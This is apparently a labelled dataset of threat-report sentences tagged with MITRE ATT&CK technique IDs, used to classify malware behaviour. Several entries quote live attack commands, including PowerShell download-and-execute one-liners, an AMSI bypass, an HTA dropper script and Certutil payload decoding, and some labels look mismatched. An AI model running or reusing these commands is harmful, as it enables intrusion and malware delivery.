{"text1":"The function will take another executable embedded in the initial Trojan as a resource named \u201cM\u201d, which it attempts to inject into the following process to execute: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\cvtres.exe While it\u2019s configured to inject into cvtres.exe, the Trojan is also capable of injecting its code into the following process as well: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe \u00a0 Embedded injector Trojan The R payload discussed above is nothing more than an injector Trojan, which accepts a path to an executable and a buffer of code to inject into the process as arguments","labels":"['T1055.012', 'T1055']"}
|
|
{"text1":"The infection process is rather interesting, as it involves multiple layers of .NET assemblies that will eventually download the NanoCore remote administration tool (RAT) from a remote server and inject it into another process","labels":"['T1055', 'T1105']"}
|
|
{"text1":"The information gathered is added to a string in the following structure: <IP address>|<computer name>|<domain>|<username>|<isAdmin flag>|<hasGarbage flag from config>|<hasStartup flag from config>|<\u201chybrid\u201d mode flag from config>|<sleep interval from config>|<jitter value from config> The payload will base64 encode this string and use its DNS tunneling protocol to transmit the data to the C2","labels":"['T1033', 'T1016']"}
|
|
{"text1":"The last query is to the subdomain ihc[.]stage[.]12019683[.]ns2[.]true-deals[.]com): \u00a0 The delivered second stage shellcode is encrypted: METERPRETER: After decryption of the second stage shellcode, the shellcode deletes the \u2018MZ\u2019 prefix from within a very important part of the shellcode","labels":"['T1064', 'T1027']"}
|
|
{"text1":"The latter PowerShell injects a shellcode into its own process using well-known CreateThread and VirtualAlloc techniques: \u00a0 SHELLCODE: The shellcode phase of this attack is unique and demonstrates the constantly advancing abilities of attackers","labels":"['T1064', 'T1059.001']"}
|
|
{"text1":"The loader\u2019s main goal was to run a PowerShell command to execute shellcode","labels":"['T1059', 'T1059.001']"}
|
|
{"text1":"The lures are primarily documents of interest to Pakistani nuclear organizations and the Pakistani military as can be seen in the images below: Figure 1 Lure extracted from a67220bcf289af6a99a9760c05d197d09502c2119f62762f78523aa7cbc96ef1 Figure 2 Lure extracted from 07d5509988b1aa6f8d5203bc4b75e6d7be6acf5055831cc961a51d3e921f96bd Figure 3 Lure extracted from b8abf94017b159f8c1f0746dca24b4eeaf7e27d2ffa83ca053a87deb7560a571 Figure 4 Lure extracted from d486ed118a425d902044fb7a84267e92b49169c24051ee9de41327ee5e6ac7c2 and fd8394b2ff9cd00380dc2b5a870e15183f1dc3bd82ca6ee58f055b44074c7fd4 \u00a0 The payload from each of the malicious documents is an updated version of the BADNEWS malware family","labels":"['T1204', 'T1560']"}
|
|
{"text1":"The macro downloads a payload from hxxp:\/\/lokipanelhostingpanel[.]gq\/work\/kh\/1.exe (SHA256: 84ed59953f57f5927b9843f35ca3c325155d5210824d3b79b060755827b51f72) by running the following command line process:cmd.exe \/c powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http:\/\/lokipanelhostingpanel[.]gq\/work\/kh\/1.exe','%Public%\\\\\\\\svchost32.exe');Start-Process '%Public%\\\\\\\\svchost32.exeThe macro then attempts to kill Microsoft Office and Windows Defender processes using the \u2018taskkill\u2019 command","labels":"['T1055.012', 'T1057']"}
|
|
{"text1":"The macro saves the chkSrv.vbs script to the system, which is responsible for running the IntelSecurityAssistManager.exe payload (OopsIE Trojan) and cleaning up the installation by deleting the two scheduled tasks, the Base.txt file, the ThreeDollars document, and the chkSrv.vbs script","labels":"['T1053.005', 'T1070.004']"}
|
|
{"text1":"The main function of the dropper All strings within the dropper, as well as the backdoor, are encrypted using a hardcoded RSA256 key","labels":"['T1140', 'T1027']"}
|
|
{"text1":"The malicious DLL is also responsible for terminating the cliconfg.exe process and deleting the malicious NTWDBLIB.dll using: cmd \/c taskkill \/im cliconfg.exe \/f \/t && del \/f \/q NTWDBLIB.DLL All the following capabilities described are implemented by the malicious service DLL implant unless specified.\u00a0\u00a0 Variant using North Korean Red Cross Another variant (hash: 9e2c0bd19a77d712055ccc0276fdc062e9351436) of the malicious Word dropper uses the same Base64-decoding scheme with a different custom key","labels":"['T1055', 'T1574.002']"}
|
|
{"text1":"The malware beacons to this directory using the hardcoded API token and attempts to download these files (which are deleted from the Dropbox account after the download): upload.bat, a batch script that the compromised machine will execute upload.rar, a RAR archive that contains at least two files: a batch script to execute, and often an executable (sometimes named rar.exe) \u00a0which the batch script will run and almost always uploads the results of download.rar to the cloud storage account silent.txt and period.txt, \u00a0small files sizes of 0-4 bytes that dictate the frequency to check in with the CnC The threat actor will then download the results and then delete the files from the cloud storage account","labels":"['T1064', 'T1105']"}
|
|
{"text1":"The malware demonstrates its evasive behavior by checking for the presence of specific processes related to antimalware products: The presence of any process with the keywords \u201cv3\u201d and \u201ccleaner.\u201d Checking for antimalware or cleaner processes","labels":"['T1562.001', 'T1057']"}
|
|
{"text1":"The malware uses obfuscation in order to hide strings such as URL or User-Agent, the algorithm is based on bitwise (SUB 0x0F XOR 0x21), here is the decoded data:hxxp:\/\/old[.]jrchina[.]com\/btob_asiana\/udel_confirm.phpMozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident\/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0; .NET4.0E; InfoPath.3)The downloaded third payload is obfuscated using the same technique","labels":"['T1087', 'T1027']"}
|
|
{"text1":"The malware utilizes several persistence mechanisms including scheduled tasks, Userinit and Run registry keys in the HKLM hive","labels":"['T1053.005', 'T1547.001']"}
|
|
{"text1":"The OopsIE Trojan is configured to use a C2 server hosted at:www.msoffice365cdn[.]com The Trojan will construct specific URLs to communicate with the C2 server and parses the C2 server\u2019s response looking for content within the tags <pre> and <\/pre>","labels":"['T1071', 'T1573', 'T1102', 'T1041', 'T1008']"}
|
|
{"text1":"The paths discovered are: \u2022 C:\\Users\\leo\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd \u2022 C:\\Users\\poopak\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd \u2022 C:\\Users\\Vendetta\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd \u2022 C:\\Users\\Turk\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd Leo, Poopak, Vendetta and Turk are the usernames of those creating the documents or the templates on which they are based","labels":"['T1033', 'T1005', 'T1087', 'T1204']"}
|
|
{"text1":"The payload has a function it calls early on that tests to see which DNS query types are able to successfully reach the C2 server.\u00a0 It iterates through a list of types and the first DNS type to receive a response from the C2 server will be used for all communications between the payload and the C2 server, which are in the following order (editor\u2019s note: AC is not a\u00a0 DNS record type but is a mode where the trojan will perform a request for an A record requiring ac as a subdomain): A AAAA AC \u2013 (see note above) CNAME MX TXT SRV SOA The payload uses the built-in Windows nslookup application with specific parameters and specially crafted subdomains to communicate with the C2","labels":"['T1123', 'T1071', 'T1041', 'T1008']"}
|
|
{"text1":"The Payloads The delivery documents in this attack campaign loaded remote templates whose macros installed a variety of first-stage payloads","labels":"['T1064', 'T1027']"}
|
|
{"text1":"The payload then sets EIP to the entry point of the newly injected code using the SetThreadContext API, and finally calls the NtAlertResumeThread API function to run the injected code","labels":"['T1106', 'T1140']"}
|
|
{"text1":"The payload will communicate with its C2 server to obtain the session ID and pre-shared key and write it to this registry key in the following format: \u00a0 <session id>_<pre-shared key> \u00a0 To obtain the session ID and pre-shared key, the payload will first try to contact the C2 via an HTTPS GET request to the following URL: \u00a0 hxxps:\/\/www.rdppath[.]com\/ \u00a0 If the above request using HTTPS does not result in an HTTP 200 OK message or the response data has no alphanumeric characters, the code will attempt to communicate with the C2 server using HTTP via the following URL: \u00a0 hxxp:\/\/www.rdppath[.]com\/ \u00a0 The code to communicate with the C2 via HTTP exists within an exception handler","labels":"['T1071', 'T1008']"}
|
|
{"text1":"The payload will use a specific regular expressions dependent on the type of DNS query was used to obtain the command string, which can be seen in Table 2: DNS TYPE Regex Pattern A Address:\\s+(\\d+.\\d+.\\d+.\\d+) AC \\d+-\\d+-(\\d+)-([\\w\\d+\/=]+)-\\d-.ac.$Global:domain AAAA Address:\\s+(([a-fA-F0-9]{0,4}:{1,4}[\\w|:]+){1,8}) CNAME,MX,TXT,SRV,SOA (\\d+)-([\\w\\d\/=+]{0,})\\-.$Global:domain Table 2 Types of responses provided by C2 These regular expressions are used to build strings that the payload will then subject to its command handler","labels":"['T1071', 'T1016']"}
|
|
{"text1":"The plugin uses the same network protocol as PLAINTEE and so we were able to trivially decode further commands that were sent.\u00a0 The following commands were observed: tasklist ipconfig \/all The attacker performed these two commands 33 seconds apart","labels":"['T1573', 'T1059']"}
|
|
{"text1":"The PowerShell command decodes to the following:$command = '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' if ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64') { $exec = $Env:windir + '\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe -exec bypass -window hidden -noni -nop -encoded ' + $command IEX $exec } else { $exec = [System.Convert]::FromBase64String($command) $exec = [Text.Encoding]::Unicode.GetString($exec) IEX $exec }The script above checks the system architecture to determine if it is an x64 machine and attempts to execute a base64 encoded command that decodes to the following:[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; try{ [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) }catch{} IEX (New-Object Net.WebClient).DownloadString('http:\/\/ 139.59.46[.]154:3485 \/IMo8oosieVai');This decoded PowerShell script attempts to download and execute a file using HTTP from the URL \u201chxxp:\/\/ 139.59.46[.]154:3485 \/IMo8oosieVai\u201d","labels":"['T1059.001']"}
|
|
{"text1":"The prior example decrypts to the following: mailto:121.126.211[.]94:8080;80;80 \u00a0 The following Python script may be used to decode the C2 data used by the newest Comnie variant: 12345678910111213141516171819202122232425262728293031323334353637383940 import base64import sysimport refrom string import maketransfrom struct import *import requestsdef rc4_crypt(data, key):\u00a0\u00a0S = range(256)\u00a0\u00a0j = 0\u00a0\u00a0out = []\u00a0\u00a0for i in range(256):\u00a0\u00a0\u00a0\u00a0j = (j + S[i] + ord( key[i % len(key)] )) % 256\u00a0\u00a0\u00a0\u00a0S[i] , S[j] = S[j] , S[i]\u00a0\u00a0i = j = 0\u00a0\u00a0for char in data:\u00a0\u00a0\u00a0\u00a0i = ( i + 1 ) % 256\u00a0\u00a0\u00a0\u00a0j = ( j + S[i] ) % 256\u00a0\u00a0\u00a0\u00a0S[i] , S[j] = S[j] , S[i]\u00a0\u00a0\u00a0\u00a0out.append(chr(ord(char) ^ S[(S[j] + S[i]) % 256]))\u00a0\u00a0return ''.join(out)def decode(data):\u00a0\u00a0o = \"\"\u00a0\u00a0for d in data:\u00a0\u00a0\u00a0\u00a0od = ord(d)\u00a0\u00a0\u00a0\u00a0o += chr((4 * (16 * od | od & 0xC) | (((od >> 4 | od & 0x30) >> 2))) & 0xFF)\u00a0\u00a0return obase64fixTable = maketrans(\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/\"[::-1], \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/\");def trans(string):\u00a0\u00a0return str(string).translate(base64fixTable)def altdecode(string):\u00a0\u00a0return base64.b64decode(trans(string))req = requests.get(sys.argv[1])fd = req.textoriginal_data = re.search(\"magnet:\/\\?([^\\?]+)\\?\", fd).group(1)parsed_data = altdecode(original_data)dataLength = unpack(\"<I\", parsed_data[64:68])[0]key = decode(parsed_data[0:64])data = parsed_data[dataLength*-1:]d = rc4_crypt(data, key)print(d) \u00a0 Comnie will make attempts at connecting to the IP address above using the various ports specified","labels":"['T1573', 'T1048', 'T1486']"}
{"text1":"The resulting Interop.SHDocVw .NET assembly is packed with SmartAssembly and further obfuscated using Confuser v1.9.0.0","labels":"['T1027.002', 'T1027']"}
{"text1":"The results of the decoded data may be seen below:\nFigure 13 Decrypted information\nThe decrypted data contains URLs for various online services that will be used by the attacker for downloading data that will contain the command and control (C2) server(s) and port(s) to be used by Comnie","labels":"['T1140', 'T1041', 'T1048']"}
{"text1":"The sample creates an array that contains the following strings for the Trojan to use as C2 locations: http:\/\/23.227.196[.]215\/ http:\/\/apple-iclods[.]org\/ http:\/\/apple-checker[.]org\/ http:\/\/apple-uptoday[.]org\/ http:\/\/apple-search[.]info Notice the last one is missing the trailing \u201c\/\u201d, which causes an issue when the Trojan attempts to use this string to build the remainder of the C2 URL, as the Trojan will append the next string in the URL directly to this string","labels":"['T1071', 'T1008']"}
{"text1":"The screenshots included remote desktop (RDP) sessions showing the Glimpse panel, a web browser session displaying a C2 panel called Scarecrow, web browser sessions into VPS administrative panels, and evidence of potential destructive attacks against OilRig servers","labels":"['T1113', 'T1021.001', 'T1505.003']"}
{"text1":"The script will first attempt to communicate with the C2 server using HTTPS (HTTP if unsuccessful), which involves GET requests using the session ID within the request\u2019s cookie in the PHPSESSID field, as seen in the example GET request:\nGET \/ HTTP\/1.1\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/42.0.2311.135 Safari\/537.36 Edge\/12.246\nHost: www.rdppath[.]com\nCookie: PHPSESSID=<c2 provided session id>\nConnection: Keep-Alive\nIf the payload is unable to reach the C2 via HTTPS\/HTTP, the payload yet again falls back to DNS tunneling","labels":"['T1071', 'T1041', 'T1008']"}
{"text1":"The second named scheduled task, loaded as an XML file to falsify task attributes, ran a JavaScript code block that downloaded and launched a secondary backdoor, delivered as a multi-stage PowerShell script","labels":"['T1036', 'T1064']"}
{"text1":"The SecurityAssist task is responsible for running the following command line command that uses the Certutil application to decode the base64 encoded data in Base.txt and saves the decoded data to the file %PROGRAMDATA%\\IntelSecurityAssistManager.exe:\ncmd.exe \/c Certutil -decode %appdata%\\Base.txt %programdata%\\IntelSecurityAssistManager.exe & SchTasks \/Delete \/F \/TN SecurityAssist\nThe macro also creates a second scheduled task named Conhost that waits two minutes and runs a VBScript %APPDATA%\\chkSrv.vbs","labels":"['T1140', 'T1036']"}
{"text1":"These dropped files bundle functionality for both 64bit and 32bit Windows systems and are all located within one directory: C:\\Documents and Settings\\user\\Application Data\\ATI_Subsystem\\\n6761106f816313394a653db5172dc487,amdhcp32.dll,54kb \u2190 32bit dll, CompiledOn:2014.07.02 21:13:24\nd596827d48a3ff836545b3a999f2c3e3,aticaldd.dll,60kb \u2190 64bit dll, CompiledOn:2014.07.02 21:13:26\nbc626c8f11ed753f33ad1c0fe848d898,atiumdag.dll,285kb \u2190 32bit dll, Trojan.Win32.CozyDuke.a, CompiledOn:2014.07.02 21:13:26\n4152e79e3dbde55dcf3fc2014700a022,6kb,racss.dat\nThe code copies rundll32.exe from windows\\system32 to its newly created %appdata%\\ATI_Subsystem subdirectory as \u201camdocl_as32.exe\u201d alongside the three dll\u2019s listed above","labels":"['T1055', 'T1574.001', 'T1218.011', 'T1574.002']"}
{"text1":"The series of commands, as seen in Table 2, include checks for virtualized environments, low memory, and processor counts, in addition to checks for common analysis tools running on the system","labels":"['T1518.001', 'T1497']"}
{"text1":"The server-side component provides a simple graphical user interface for threat actors interacting with web shells","labels":"['T1059', 'T1505.003']"}
{"text1":"These vulnerabilities include:\nCVE-2015-6585: Hangul Word Processor Vulnerability\nCVE-2015-8651: Adobe Flash Player 18.0.0.324 and 19.x Vulnerability\nCVE-2016-0034: Microsoft Silverlight 5.1.41212.0 Vulnerability\nCVE-2016-1019: Adobe Flash Player 21.0.0.197 Vulnerability\nCVE-2016-4117: Adobe Flash Player 21.0.0.226 Vulnerability\nDHS recommends that organizations upgrade these applications to the latest version and patch level","labels":"['T1068', 'T1203']"}
{"text1":"The SHA256 hash is then base64 encoded, which results in an encoded string of EfZrVfPSQwNiHl75VlsCpXbMWLxfh4nK6Ww9QABkuQ4=, of which the first 24 characters are used as the 3DES key","labels":"['T1027', 'T1132']"}
{"text1":"The shellcode executed by this PowerShell is the exact same as in the delivery documents, using code from Metasploit which can obtain additional shellcode to execute using an HTTP request to the following URL: http:\/\/www7.chrome-up[.]date\/0m5EE We were not able to retrieve the shellcode hosted at this URL","labels":"['T1071', 'T1064', 'T1059.001']"}
{"text1":"The source code only considers the following machine types:\ndefault: lpString = \"(Other)\"; break;\ncase 0x02: lpString = \"(Unknown)\"; break;\ncase 0x03: lpString = \"(Desktop)\"; break;\ncase 0x04: lpString = \"(Low Profile Desktop)\"; break;\ncase 0x06: lpString = \"(Mini Tower)\"; break;\ncase 0x07: lpString = \"(Tower)\"; break;\ncase 0x08: lpString = \"(Portable)\"; break;\ncase 0x09: lpString = \"(Laptop)\"; break;\ncase 0x0A: lpString = \"(Notebook)\"; break;\ncase 0x0E: lpString = \"(Sub Notebook)\"; break;\nThe string format - with the () - and the considered types are exactly the same as those used in the ROKRAT samples. It's interesting to note that this reconnaissance phase was not included in the ROKRAT variant used during the \"Golden Time\" campaign.\nBrowser Stealer\nFor the first time, the ROKRAT sample used during the \"North Korean Human Rights\" contained a browser credentials stealer","labels":"['T1008', 'T1124']"}
{"text1":"The started command will send the following information to the C&C:\ndevice_model: the model identifier (e.g.: MacBookPro9,2)\nbot_version: version of Keydnap\nbuild_name: the \u201cbuild name\u201d that was given by downloader\nos_version: OS X or macOS kernel version\nip_address: external IP address as reported by ipify.org\nhas_root: 1 if executed as root, 0 otherwise\nBackdoor commands\nThe response to get_task contains an integer to identify the type of command and optional arguments","labels":"['T1082', 'T1016']"}
{"text1":"The string \u201cfjzmpcjvqp\u201d is unique and not something likely to be present if the code was not generated with the same public POC exploit code","labels":"['T1140', 'T1027.001']"}
{"text1":"The switch statement checks for 19 cases, between 101 and 119. (Updated to correct command IDs, thanks @mykill!)\nCommand ID | Function | Description\n101 | getInfoOSX | Gathers username and OSX version and responds using the encrypted form of the following string: \u201cMac OS X \u2013 [OSX version] x64<br>\\nUser name \u2013 [username]\u201d\n102 | getProcessList | Runs \u201cps aux\u201d to obtain a list of running processes\n103 | remoteShell | Runs supplied command using \u201c\/bin\/sh\u201d\n104 | getInstalledAPP | Gets a list of installed applications by running the command \u201cls -la \/Applications\u201d\n105 | showBackupIosFolder | Checks to see if an IOS device was backed up to the system by running the command \u201cls -la ~\/Library\/Application\\ Support\/MobileSync\/Backup\/\u201d\n106 | downloadFileFromPath | Uploads a file from a specified path\n107 | createFileInSystem | Downloads a file, specifically provided within the C2 server\u2019s HTTP response\n108 | execFile | Executes a specified file on the system using the NSTask:launch method\n109 | deletFileFromPath | Deletes a specified file using the NSFileManager:removeFileAtPath method\n110 | takeScreenShot | Takes a screenshot using the CGGetActiveDisplayList, CGDisplayCreateImage, NSImage:initWithCGImage methods","labels":"['T1070.006', 'T1071', 'T1106']"}
{"text1":"The threat actor\u2019s main objective for using this RAT (known as Razy\/NeD worm\/Wonder Botnet) was obvious from the victim data that was collected \u2013 it was to search for specific file extensions such as PDF, DOC, DOCX, XLS, and XLSX, where they are compressed in RAR files per category, stored in temp directories within a folder named by victim ID (bot ID \u2013 long MD5 string), encrypted and uploaded to the C2","labels":"['T1005', 'T1083', 'T1074']"}
{"text1":"The tool runs the following list of WMI queries:\nwmic logicaldisk get Caption, Description,VolumeSerialNumber,Size,FreeSpace\nwmic diskdrive get Model, SerialNumber\nwmic computersystem get Manufacturer, Model, Name, SystemTypec\nwmic os get Caption, OSArchitecture, OSLanguage,SystemDrive,MUILanguages\nwmic process get Caption,ExecutablePath\nThe URL used to send the system information, running processes and a screenshot to the C2 server is:\nhxxp:\/\/145.249.105[.]165\/resource-store\/stockroom-center-service\/check.php?fm=[serial number]\nThe C# variant of Zebrocy uses an HTTP POST request to the URL above to transmit the gathered data, of which is included within the HTTP POST data that is structured as follows:\nspp=[system information from WMI queries] &spvg=[screenshot in JPEG format]\nConclusion\nThe Sofacy group continues their attacks on organizations across the globe using similar tactics and techniques","labels":"['T1047', 'T1057', 'T1041']"}
{"text1":"The Trojan checks the modified time of the file by creating an HTTP request to a URL structured as follows: <Google Drive URL in \u2018gdu\u2019> + <file identifier> + \u201c?supportTeamDrives=true&fields=modifiedTime\u201d The Trojan then uses the following regular expression to obtain the modified time of the file from the HTTP response, which is saved to the variable named modification_time: \\\u201dmodifiedTime\\\u201d:(.*) The Trojan then uploads a second file to the Google Drive, the purpose of which is to allow the Trojan to continually write to this file as it waits for the actor to modify the first file uploaded","labels":"['T1070.006', 'T1074', 'T1547.009', 'T1105']"}
{"text1":"The Trojan compares the TimeZone.CurrentTimeZone.DaylightName property to strings Iran, Arab, Arabia and Middle East, which will match the following time zones in Windows:\nArabic Daylight Time (UTC+3)\nArab Daylight Time (UTC+3)\nArabian Daylight Time (UTC+4)\nMiddle East Daylight Time (UTC+2)\nIran Daylight Time (UTC+3.5)\nAccording to MSDN, these five time zones encompass 10 countries that fall within UTC+2, +3, +3.5 or +4 as seen in Figure 3","labels":"['T1070.006', 'T1124']"}
{"text1":"The Trojan downloads the contents of this file by crafting an HTTP request to a URL structured as follows: <Google Drive URL in \u2018gdu\u2019> + <first file identifier> + \u201c?alt=media\u201d With the contents of the file downloaded, the Trojan sets the modification_time variable to the current modification time so the Trojan knows when the actor makes further changes to the file","labels":"['T1070.006', 'T1083', 'T1105']"}
{"text1":"The Trojan will convert these hexadecimal bytes to their binary values and write them to a file and will run the file using the \u201copen\u201d function using the ShellExecuteW API function","labels":"['T1106', 'T1140']"}
{"text1":"The URL used can be found in the embedded OLE object:\nhxxp:\/\/old[.]jrchina[.]com\/btob_asiana\/udel_calcel.php?fdid=[base64_data]\nHere is the source code of the downloaded HTA document:\n<!DOCTYPE html PUBLIC \"-\/\/W3C\/\/DTD XHTML 1.0 Transitional\/\/EN\" \"http:\/\/www.w3.org\/TR\/xhtml1\/DTD\/xhtml1-transitional.dtd\">\n<html xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\">\n<head>\n<meta content=\"text\/html; charset=utf-8\" http-equiv=\"Content-Type\" \/>\n<title>Bonjour<\/title>\n<script language=\"VBScript\">\nSet owFrClN0giJ = CreateObject(\"Wscript.Shell\")\nSet v1ymUkaljYF = CreateObject(\"Scripting.FileSystemObject\")\nIf v1ymUkaljYF.FileExists(owFrClN0giJ.ExpandEnvironmentStrings(\"%PSModulePath%\") + \"..\\powershell.exe\") Then\nowFrClN0giJ.Run \"powershell -nop -windowstyle hidden -executionpolicy bypass -encodedcommand JABjAD0AbgBlAHcALQBvA[...redacted...]H0AIAA=\" ,0\nowFrClN0giJ.Run \"cmd \/c echo hta>%tmp%\\webbrowser1094826604.tmp\", 0\nEnd If\nSelf.Close\n<\/script>\n<hta:application id=\"oHTA\" applicationname=\"Bonjour\" application=\"yes\">\n<\/head>\n<\/html>\nOnce decoded using the base64 algorithm, we are able to read the final payload:\n$c=new-object System.Net.WebClient\n$t =$env:temp\n$t1=$t+\"\\\\alitmp0131.jpg\"\n$t2=$t+\"\\\\alitmp0132.jpg\"\n$t3=$t+\"\\\\alitmp0133.js\"\ntry {\n  echo $c.DownloadFile( \"hxxp:\/\/old[.]jrchina[.]com\/btob_asiana\/appach01.jpg\",$t1)\n  $c.DownloadFile( \"hxxp:\/\/old[.]jrchina[.]com\/btob_asiana\/appach02.jpg\",$t2)\n  $c.DownloadFile( \"hxxp:\/\/old[.]jrchina[.]com\/btob_asiana\/udel_ok.ipp\",$t3)\n  wscript.exe $t3\n}catch { }\nThe purpose of this script is to download and execute a Windows script and two encoded payloads","labels":"['T1071', 'T1064']"}
{"text1":"The v.vbs script drops four components (hUpdateCheckers.base, dUpdateCheckers.base, cUpdateCheckers.bat, and GoogleUpdateschecker.vbs) to the directory: C:\\ProgramData\\Windows\\Microsoft\\java\\ v.vbs uses CertUtil.exe, a legitimate Microsoft command-line program installed as part of Certificate Services, to decode the base64-encoded files hUpdateCheckers.base and dUpdateCheckers.base, and drop hUpdateCheckers.ps1 and dUpdateCheckers.ps1 to the staging directory","labels":"['T1036', 'T1074', 'T1064']"}
{"text1":"The VB.NET variant then gathers system information and running processes like other Zebrocy variants by running the following commands:\nsysteminfo & tasklist\nThe URL used to send the system information, running processes and a screenshot to the C2 server is:\nhxxp:\/\/109.248.148[.]42\/agr-enum\/progress-inform\/cube.php?res=[serial number]\nThe VB.NET variant of Zebrocy uses an HTTP POST request to the URL above to transmit the gathered data, of which is included within the HTTP POST data that is structured as follows (notice the spaces before and after ampersand \u201c&\u201d):\ndata=[system information and running processes] & arg=[screenshot in BMP format]\nC# Zebrocy Variant\nThe C# variant of Zebrocy is similar to other variants in functionality, but also has several unique attributes that are worth discussing","labels":"['T1082', 'T1057', 'T1132']"}
{"text1":"The weaponized Office documents were found to be hosted either on what appeared to be compromised legitimate websites, or on websites using domain names similar to legitimate domain names in appearance","labels":"['T1036', 'T1102']"}
{"text1":"The White Atlas framework often utilized a small Javascript script to execute the malware dropper payload after it was decrypted by the VBA macro code, then to delete the dropper afterwards","labels":"['T1070.004', 'T1064']"}
{"text1":"The x command treats the supplied data as a PowerShell script that it will write to the current PowerShell script (Office365DCOMCheck.ps1\/SystemDiskClean.ps1), effectively overwriting the initial PowerShell script with a secondary payload script","labels":"['T1064', 'T1059.001']"}
{"text1":"BE2 also uses start menu locations for persistence: Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start","labels":"['T1007', 'T1036', 'T1074']"}
{"text1":"The \u201cExcel\u201d command receives another stage of the PowerShell code, saves it in \u201cc:\\programdata\\a.ps1\u201d and then asks Excel to execute this PowerShell script via DDE","labels":"['T1059', 'T1059.001']"}
{"text1":"This account was suspended in short order, but immediately after the suspension, an alternate account with the username @dookhtegan1 with the same stylized profile image appeared and is still currently active","labels":"['T1033', 'T1087']"}
{"text1":"This decrypted data is written to the following location: %TEMP%\\WUpdate.~tmp This \u2018WUpdate.~tmp\u2019 file is then copied to a filename of \u2018Applet.cpl\u2019, which is placed in the previously identified file path","labels":"['T1140', 'T1074']"}
{"text1":"This DLL file creates a scheduled task named BaiduUpdateTask1, which attempts to run the malicious, spoofed MSBuild.exe every subsequent minute","labels":"['T1053.005', 'T1036']"}
{"text1":"This file is written to the following file path: % TEMP%\\Update.~tmp After the file is written, it is then copied to a filename of \u2019winhelp.cpl\u2019 in the directory that was initially chosen","labels":"['T1070.006', 'T1036', 'T1074']"}
{"text1":"This has led it to do more, such as:\nCommunication with more C&C servers \u2013 up to 16\nP2P communication between infected nodes\nMAC address check - PlugX runs if the MAC address of an infected host coincides with configuration information in itself (If not specified in the configuration, PlugX runs on any host)","labels":"['T1082', 'T1016']"}
{"text1":"This indicates that the attackers stole and modified a legitimate document from the compromised user account, crafted a malicious decoy Word macro document using this stolen document and sent it to the target recipient who might be expecting the email from the original account user before the real sender had time to send it","labels":"['T1598.002', 'T1087', 'T1204']"}
{"text1":"This is a classic RAT that can download, upload, execute commands on the victim host and, finally, perform keylogging","labels":"['T1056', 'T1105']"}
{"text1":"This is performed by checking if the following libraries are loaded on the victim machine.\nSbieDll.dll (sandboxie library)\nDbghelp.dll (Microsoft debugging tools)\nApi_log.dll (threatAnalyzer \/ GFI SandBox)\nDir_watch.dll (threatAnalyzer \/ GFI SandBox)\nWe were able to uncover some other techniques used by this variant of ROKRAT to make analysis difficult. Group 123 used an anti-debugging technique related to NOP (No Operation).\nnop dword ptr [eax+eax+00h] is a 5 byte NOP","labels":"['T1574.001', 'T1574.002']"}
{"text1":"This log contains the external IP, the geographic location, the machine name, the time the machine was infected, as well as fields to be logged in the threat actor\u2019s database","labels":"['T1070', 'T1124']"}
{"text1":"This particular sample connected to the CnC domain accounts.serveftp[.]com, which resolved to an IP address previously used by the threat group, although the IP had not been used for some time prior to this most recent activity: MD5 0beb957923df2c885d29a9c1743dd94b accounts.serveftp.com 59.188.0.197 BUBBLEWRAP is a full-featured backdoor that is set to run when the system boots, and can communicate using HTTP, HTTPS, or a SOCKS proxy","labels":"['T1071', 'T1016']"}
{"text1":"This plugin provides the attacker with the ability to both list files and download\/upload files on the victim machine","labels":"['T1083', 'T1105']"}
{"text1":"This shortcut file points to \u2018C:\\Windows\\system32\\rundll32.exe \u201c%APPDATA%\\cnagnt.dll\u201d,Sd\u2019 One of the exceptions to the installation routine above is in the event Symantec is detected","labels":"['T1218.011', 'T1547.009']"}
{"text1":"This task is executed every 25 minutes and will repeat the actions described above \u2013 recreating the JavaScript code which later will create and execute a PowerShell script (described below)","labels":"['T1064', 'T1059.001']"}
{"text1":"Thread Name | Description\nKey logger | Logs key strokes for configured processes and sends them to the command and control (C2) server\nForm grabber | Monitors HTTP traffic for form data and sends it to the C2 server\nPOS monitor | Monitors for changes to logs stored in C:\\NSB\\Coalition\\Logs and nsb.pos.client.log and sends parsed data to the C2 server\nPST monitor | Searches recursively for newly created Outlook personal storage table (PST) files within user directories and sends them to the C2 server\nHTTP proxy monitor | Monitors HTTP traffic for requests sent to HTTP proxies, saves the proxy address and credentials for future use","labels":"['T1071', 'T1090', 'T1041', 'T1132', 'T1486']"}
{"text1":"Threat actor using appcmd to delete logs and disable logging","labels":"['T1562.001', 'T1070.004']"}
{"text1":"To create the scheduled task, the PowerShell payload starts by writing the following to a VBScript file with the same name as the task name \u00a0(ex","labels":"['T1053.005', 'T1036']"}
{"text1":"To install the payload, the script will create a file %APPDATA%\\OneDrive.bat and save the following string to it: powershell.exe -WindowStyle Hidden -exec bypass\u00a0 -File \u201c%APPDATA%\\OneDrive.ps1\u201d The script then writes a modified copy of itself to %APPDATA%\\OneDrive.ps1, with the code that performs this installation omitted","labels":"['T1036', 'T1064']"}
{"text1":"To set up persistence, the loader creates a folder named \u201cc:\\temp\u201d, sets its attributes to be a hidden and system folder to hide the folder from view in Windows Explorer","labels":"['T1547.001', 'T1564.001']"}
